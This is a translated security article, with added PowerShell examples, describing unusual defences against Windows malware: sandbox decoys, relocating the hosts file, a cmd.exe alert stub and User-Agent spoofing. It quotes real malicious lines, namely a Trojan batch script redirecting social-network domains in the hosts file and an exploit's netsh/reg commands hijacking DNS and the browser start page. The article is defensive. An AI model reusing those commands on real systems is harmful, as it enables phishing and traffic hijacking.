
Non-obvious ways to protect against malware

In arguments and discussions about how to protect a computer from malware, many lances have been broken; plenty of books and articles exist on the topic, and most of them simply duplicate each other, saying the same thing in different words. Anyone who is interested in information security very rarely finds anything new about protection in such discussions and articles, anything they did not already know or had simply never thought about... but, arrogant as it sounds, I will still try to stir up at least a little interest in this well-worn topic and talk about some non-obvious methods of protection, leaving out the grumbling about updating browser plugins in time, not following dubious links, and so on.

In this short note about some interesting features of how malware operates, I urge you to abandon antivirus and the other means of self-defence: updates, program settings, and caution when clicking on links and launching applications... now add the particle "NOT" to the word "urge" and everything falls into place.


This article should be taken only as an unusual overview of common patterns in malware behaviour that we can turn into protection, protection that should be regarded more as "oh, cool, the malware doesn't work!", a sort of curiosity turned up during virus research.

We should start with the fact that the most obvious protection is to work under a user account rather than an administrator one, but since only a few are capable of such a sacrifice and the majority sit with admin rights, we will not return to this unpleasant topic; still, it stands, in case it ever comes in handy.

[offtopic] I am itching to shout that the Java plugin should be turned off and enabled only when needed; that viewing PDFs in the browser is not really necessary, since files are better saved to disk and then opened in some obscure, uninteresting PDF viewer; that autorun from flash drives can be disabled by adding a couple of lines to the registry, namely ... but all these semi-obvious protection methods are known without me, so I ask everyone's forgiveness: those who expected a complete PC security analysis, for the fact that there will not be one, and those who expected only new material, for remembering these classics. [/offtopic]

I am a cloud, a cloud, a cloud, and not a bear at all

Quite a lot of malware (or rather its creators) is aware of the existence of antiviruses, virus analysts, automated analysis systems and the rest of the good guys' infrastructure, and tries in every way to complicate their lives and extend the life of its handiwork with various techniques that make analysing the malware and writing a detection for it harder. The simplest example is encryption/packing, which kills several birds with one stone:
- if the malware gets detected, you repack it and it is back in business
- disassemblers and static analyzers become useless (manual analysis with a debugger is needed)
- not every antivirus emulator will unwind even a simple cryptor
That is the most banal example, given only to show which direction hackers think in (strictly speaking they should be called criminals, but somewhere a tradition of substituting concepts has taken hold...). And here is the next thought (from the malware's point of view): if I sense that I am being analysed, I will not do anything malicious, so that they either do not understand how I work or do not see my evil nature at all. It identifies its "subject matter" as follows:

1. Detection of being run under an online behaviour-analysis service (Anubis, ThreatExpert, ...)
Done by checking the computer name, the user name, the presence of certain DLLs in the address space, and certain operating-system registry keys.
2. Virtual machine detection (VMware, sandbox)
By searching for specific processes, registry keys and hardware, and by spotting differences from a normal system with various assembler tricks.
3. Debugger detection
Checking certain bytes in the environment; searching for a window, process or driver.
4. Detection of active/passive monitoring utilities (RegMon, FileMon, RegShot)
Usually implemented by searching for a window by its title.

The essence of this anti-malware protection is simple to the point of ugliness: let the malware believe it is being analysed and it will give up its bad intentions by itself. Moving from theory to practice (within reason), we can say the following (on the corresponding points):
1. The user name and the computer name are sandbox.
2. Processes in the system: vmware.exe, VMwareTray.exe. The key HKLM\SYSTEM\ControlSet001\Services\vmware. The driver file vmnet.sys.
3. Many detect the SoftICE driver: just run it, it will drop the driver, and that is it (yes, they are still looking for it!). A window with the class "OllyDBG".
4. Windows titled "File Monitor - Sysinternals: www.sysinternals.com" and "Registry Monitor - Sysinternals: www.sysinternals.com".
In essence, all of this is easy to do (if you want to): choose certain names during installation, create a couple of keys/files, write a tool that keeps several invisible windows with certain titles open, and name the tool itself vmware.exe.
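One way to plant the decoys from points 2 to 4, as an added PowerShell example that is not from the article or its author. The registry key, the driver file name, the process name and the window titles are the ones listed above; the location of the fake vmware.exe and the use of a copied powershell.exe as its body are my assumptions.

```powershell
# Run from an elevated PowerShell. Added example: plant the artefacts sandbox-aware
# malware looks for, so that it decides it is being analysed and bails out.

# 2. A bogus VMware service key and a dummy vmnet.sys driver file (a name check is all
#    most samples do, so an empty file and an empty key are enough).
$svc = 'HKLM:\SYSTEM\ControlSet001\Services\vmware'
if (-not (Test-Path $svc)) { New-Item -Path $svc -Force | Out-Null }
$drv = Join-Path $env:SystemRoot 'System32\drivers\vmnet.sys'
if (-not (Test-Path $drv)) { New-Item -Path $drv -ItemType File | Out-Null }

# 3./4. A process named vmware.exe that keeps two invisible windows alive with the
#    FileMon/RegMon titles, so both process-list and FindWindow-by-title checks succeed.
$decoyBody = @'
Add-Type -AssemblyName System.Windows.Forms
$titles = 'File Monitor - Sysinternals: www.sysinternals.com',
          'Registry Monitor - Sysinternals: www.sysinternals.com'
$forms = foreach ($t in $titles) {
    $f = New-Object System.Windows.Forms.Form
    $f.Text = $t; $f.ShowInTaskbar = $false; $f.Opacity = 0
    $f.Show(); $f
}
[System.Windows.Forms.Application]::Run()   # message loop; runs until the process is killed
'@
$fake = Join-Path $env:ProgramData 'vmware.exe'          # assumed location
Copy-Item (Join-Path $PSHOME 'powershell.exe') $fake -Force
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($decoyBody))
Start-Process -FilePath $fake -WindowStyle Hidden -ArgumentList '-NoProfile', '-EncodedCommand', $encoded

# 1. Names (optional, needs a reboot): Rename-Computer -NewName sandbox -Force,
#    plus an account called sandbox.

# Check: the artefacts the malware probes for are now present.
Get-Process vmware -ErrorAction SilentlyContinue | Select-Object Name, Id
Test-Path $svc; Test-Path $drv
```

The decoy process has to be restarted after every logon (a scheduled task or Run key entry does that); the key and the driver file persist on their own.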

VKontakte has been disabled for non-payment of hosting

You may laugh, but many of our compatriots can see something like this on their screens. Qhost-class Trojans, whose whole job is to crudely edit the hosts file and be done with it: a bogus IP address is assigned to the addresses of popular social networks (VKontakte, Odnoklassniki)... and the person loses their login/password and also sends an SMS...
Despite the technological simplicity of creating them, these Trojans bring their creators great profit: minimal effort and, in a short time, a lot of VKontakte accounts and money. The hosts file is edited either directly (open -> write) or through the command interpreter (creating and running a .bat/.vbs). It is all very simple: the file sits at a fixed path (C:\WINDOWS\system32\drivers\etc\hosts) and a few lines need to be appended to its end, which is the second programming lesson in any language after hello world! And here is a small protection trick: the path to the etc folder is specified in the registry, and if you change it to another folder (put all the files from the old one there and wipe them from etc), the Trojan will be somewhat surprised...

Here are the keys:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\DataBasePath (and likewise for the other ControlSet00X keys).
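The relocation described above, as an added PowerShell example that is not from the article. The DataBasePath value and the ControlSet keys are the ones named in the text; the new directory name netdb and the idea of leaving an empty decoy hosts file behind are my assumptions.

```powershell
# Run from an elevated PowerShell. Added example: move the TCP/IP database directory so
# that a Qhost-style Trojan appending to the hard-coded ...\drivers\etc\hosts edits a
# file the resolver no longer reads.
$oldDir = Join-Path $env:SystemRoot 'System32\drivers\etc'
$newDir = Join-Path $env:SystemRoot 'System32\drivers\netdb'   # assumed new name

New-Item -ItemType Directory -Path $newDir -Force | Out-Null
Copy-Item -Path (Join-Path $oldDir '*') -Destination $newDir -Force

# Point DataBasePath at the new directory in every ControlSet00X; CurrentControlSet is
# a link to one of them, so it follows automatically.
Get-ChildItem 'HKLM:\SYSTEM' |
    Where-Object { $_.PSChildName -match '^ControlSet\d{3}$' } |
    ForEach-Object {
        $params = "Registry::$($_.Name)\Services\Tcpip\Parameters"
        if (Test-Path $params) { Set-ItemProperty -Path $params -Name DataBasePath -Value $newDir }
    }
# The DNS client re-reads DataBasePath when restarted; if the restart is refused, reboot.
Restart-Service Dnscache -Force -ErrorAction Continue

# Leave an empty decoy hosts file behind: whatever a Trojan appends there is harmless,
# and a decoy that is suddenly non-empty is a cheap infection indicator.
Remove-Item (Join-Path $oldDir '*') -Force
Set-Content -Path (Join-Path $oldDir 'hosts') -Value '' -Encoding Ascii

# Check: the active path is the relocated one and the decoy is still empty.
(Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters').DataBasePath
Get-Content (Join-Path $oldDir 'hosts') | Where-Object { $_ -match '\S' }   # expect no output
```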

One can make an assumption about the intelligence and nationality of the authors of some Trojans of this class even without looking at the code:

image

The batch files look like this (for simplicity the obfuscation has been removed, leaving only the TANGLE variable to give a visual idea of how bat files are obfuscated):

SET TEATEATEA=%windir%\System32\drivers\etc\hosts
SET TANGLE=.co
echo 66.55.140.181 my.mail.ru >>%TEATEATEA%
echo 66.55.140.181 m.my.mail.ru >>%TEATEATEA%
echo 66.55.140.181 vk%TANGLE%m >>%TEATEATEA%
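An analyst's view of the same trick, as an added PowerShell example that is not from the article: it expands the SET/%VAR% obfuscation the way cmd.exe would and lists the hosts-file redirects the batch file would write, so a script scanning downloaded .bat files sees the real targets. The function names are mine; the input lines are the ones quoted above.

```powershell
# Added example: resolve %VAR% references in a batch line from the SET values seen so far
# (falling back to the environment, then to '' as cmd.exe does for unknown names).
function Expand-BatVars([string]$Text, [hashtable]$Vars) {
    $out = $Text
    foreach ($m in [regex]::Matches($Text, '%([^%]+)%')) {
        $name = $m.Groups[1].Value
        $value = if ($Vars.ContainsKey($name)) { $Vars[$name] }
                 elseif (Test-Path "env:$name")  { (Get-Item "env:$name").Value }
                 else { '' }
        $out = $out.Replace($m.Value, $value)
    }
    $out
}

# Walk the batch lines, track SET assignments and report every "echo IP host >> hosts".
function Get-BatHostsRedirects([string[]]$Lines) {
    $vars = @{}                                   # hashtable keys are case-insensitive, like cmd variables
    foreach ($raw in $Lines) {
        $line = $raw.Trim()
        if ($line -match '^SET\s+([^=]+?)\s*=\s*(.*)$') {
            $vars[$Matches[1]] = Expand-BatVars $Matches[2] $vars
        }
        elseif ($line -match '^echo\s+(.+?)\s*>>\s*(.+)$') {
            $text   = Expand-BatVars $Matches[1] $vars
            $target = Expand-BatVars $Matches[2] $vars
            if ($target -match 'drivers\\etc\\hosts$' -and $text -match '^(\S+)\s+(\S+)$') {
                [pscustomobject]@{ IP = $Matches[1]; Host = $Matches[2]; File = $target }
            }
        }
    }
}

# Constructed input: the dropper lines quoted in the article.
$sample = @(
    'SET TEATEATEA=%windir%\System32\drivers\etc\hosts',
    'SET TANGLE=.co',
    'echo 66.55.140.181 my.mail.ru >>%TEATEATEA%',
    'echo 66.55.140.181 m.my.mail.ru >>%TEATEATEA%',
    'echo 66.55.140.181 vk%TANGLE%m >>%TEATEATEA%'
)
Get-BatHostsRedirects $sample | Format-Table -AutoSize   # three rows, the last one vk.com
```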


Can you see the console? No? But it is there...

When a vulnerability is exploited, the shellcode often performs its various actions by manipulating cmd.exe: it is easy to launch (the system will even find the path to it by itself), its name is short, and it is always present in the system, which matters a lot for shellcode, especially in light of the recent technologies that shuffle the addresses of everything they can in the address space.
So our main task is to play a dirty trick on the hackers (a big, suspiciously grunting one): replace the system cmd.exe (including its copies in dllcache, i386, $NtServicePackUninstall$) with our own stub which, when called, saves the passed parameters to a buffer, raises an alert "Continue or not?", and on consent launches the real cmd (previously placed alongside under a different name) with the same parameters.
Modern malware performs many critical actions in the system by running cmd.exe with kilometre-long parameters (for example, making changes to that same hosts file).

The stub can be made smarter by reading from a config which processes should not trigger an alert, with their parameters passed straight through to the real cmd.
This thought began to take shape, grow and strengthen while observing how close malware and cmd.exe have become: they are better friends than ever, and more than that, cmd is their Taras Bulba: it gave them life and it takes it away. When an exploit fires, it is often cmd that launches the downloaded malware, and the self-deletion method is also implemented via a bat file; during its work, the malware sometimes loads the command interpreter with tasks as well.
Separately, I would like to note the existence of disembodied evildoers that have no exe file of their own in the system at all: Java executes everything, the exploit tells it what to do and it obediently does it. Here is an example from real life (these actions are performed by the java.exe process):

cmd.exe /C "ChCp 1251 & netsh interface ip set dns name="Local Area Connection" source=static addr=5.199.140.178"
reg add "hkcu\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /f /d "shtpp://dubsearch.ru"


I wrote this utility for myself for research purposes; if you need the source code or the tool itself, contact me and I will hand it over without any problem, I do not mind.
At this point it is worth noting another important detail that imposes serious restrictions on using this protection method on a real system: if you are a licensed user of the Immunity antivirus, there will be a lot of requests to launch batch files from our fake cmd.exe.
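A non-invasive cousin of the stub, as an added PowerShell example that is not the author's tool: instead of replacing cmd.exe it subscribes to process-start events, records every cmd.exe launch with its parent and command line, and flags the patterns described above (spawned by java.exe or a browser, or carrying hosts, netsh or "reg add" work). The config hashtable plays the role of the stub's "do not alert for these processes" list; every name in it is an assumption to tune for your own antivirus and build tools.

```powershell
# Run from an elevated PowerShell (Win32_ProcessStartTrace needs it). Added example:
# log and triage every cmd.exe start without touching the real binary.
$config = @{
    QuietParents = @('explorer.exe', 'MSBuild.exe')                              # assumed trusted launchers
    NoisyParents = @('java.exe', 'javaw.exe', 'iexplore.exe', 'firefox.exe', 'chrome.exe', 'AcroRd32.exe')
    NoisyArgs    = 'drivers\\etc\\hosts|netsh\s+interface|reg\s+add|Start Page'  # work the article shows
    Log          = Join-Path $env:ProgramData 'cmd-watch.log'
}

$onStart = {
    $cfg = $Event.MessageData
    $ev  = $Event.SourceEventArgs.NewEvent            # Win32_ProcessStartTrace instance
    # A short-lived cmd.exe may be gone before we query it; keep whatever we can get.
    $proc   = Get-CimInstance Win32_Process -Filter "ProcessId = $($ev.ProcessID)"
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($ev.ParentProcessID)"
    $cmdline    = if ($proc)   { $proc.CommandLine } else { '<exited before query>' }
    $parentName = if ($parent) { $parent.Name }      else { '<unknown>' }
    $verdict = if ($cfg.QuietParents -contains $parentName) { 'quiet' }
               elseif ($cfg.NoisyParents -contains $parentName -or $cmdline -match $cfg.NoisyArgs) { 'SUSPICIOUS' }
               else { 'review' }
    $line = '{0:u} {1} parent={2} pid={3} cmdline={4}' -f (Get-Date), $verdict, $parentName, $ev.ProcessID, $cmdline
    Add-Content -Path $cfg.Log -Value $line
    if ($verdict -eq 'SUSPICIOUS') { Write-Host $line -ForegroundColor Yellow }
}

Register-CimIndicationEvent -Query "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'cmd.exe'" `
    -SourceIdentifier CmdWatch -MessageData $config -Action $onStart | Out-Null
# Stop watching with: Unregister-Event -SourceIdentifier CmdWatch
```

Unlike the stub, this only observes and cannot stop the launch, but it gives the same record of parameters without breaking the antivirus's own batch files.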

Linux to the right, Windows to the left

It is known that most malware arrives on our computer through its window onto the Internet, the browser and its plugins, so by putting protection at this stage (File -> Work Offline... a joke) we cut off the lion's share of threats. To do that, let us briefly look at how an exploit pack works:
1. Information about the browser and its version, the operating system and the language is taken from the User-Agent.
2. Depending on the result of the first step (see below), it either determines which plugins are present and exploits their vulnerabilities, or, if there is nothing suitable among the available exploits, nothing bad happens.

Of course, there are exceptions, when regardless of anything all the exploits are shoved into the page code at once (maybe at least something will work), but most exploit packs keep statistics and per-country accounting, have a nice interface, and other goodies and settings. Hence the protection philosophy: change the User-Agent and put something there for which there is definitely no exploit in stock, such as Linux. Ideally, of course, one would replace the User-Agent with that of a Linux browser completely, but in theory this could cause small page distortions on some sites, although I did not notice any.
All the popular bundles (the same Blackhole exploit kit) will instantly send you off to talk to Google, without even trying a single exploit on your browser.
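Applying the User-Agent swap in Firefox, as an added PowerShell example that is not from the article: it writes the general.useragent.override pref (the same one you can set by hand in about:config) into each profile's user.js, which Firefox reads at start-up. The UA string is a constructed Linux Firefox example and the function name is mine.

```powershell
# Added example: make Firefox introduce itself as a Linux browser on every site.
$linuxUA = 'Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0'   # constructed sample

function Set-FirefoxUserAgent([string]$UserAgent) {
    $profileRoot = Join-Path $env:APPDATA 'Mozilla\Firefox\Profiles'
    foreach ($p in Get-ChildItem $profileRoot -Directory -ErrorAction Stop) {
        $userJs = Join-Path $p.FullName 'user.js'
        $pref   = 'user_pref("general.useragent.override", "{0}");' -f $UserAgent
        $lines  = if (Test-Path $userJs) { @(Get-Content $userJs) } else { @() }
        # drop any previous override and append the new one, leaving other prefs untouched
        $kept = $lines | Where-Object { $_ -notmatch '^\s*user_pref\("general\.useragent\.override"' }
        Set-Content -Path $userJs -Value (@($kept) + $pref) -Encoding Ascii
        "$($p.Name): $pref"
    }
}

Set-FirefoxUserAgent $linuxUA
# Check after restarting Firefox: navigator.userAgent in the web console should report Linux.
# Undo by deleting the user_pref line from user.js (a value set in user.js is re-applied at every start).
```

If a site renders badly with the Linux string, that is the distortion mentioned above; switch the override off for that site rather than dropping it altogether.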

Instead of a conclusion

The article should in no way be taken as a call to abandon antivirus and the other reasonable protections you all know. It is just that, in addition to them, one can either use the methods I have described or not use them, but simply be aware that such obstacles exist in the life path of malware.

Source: https://habr.com/ru/post/172279/

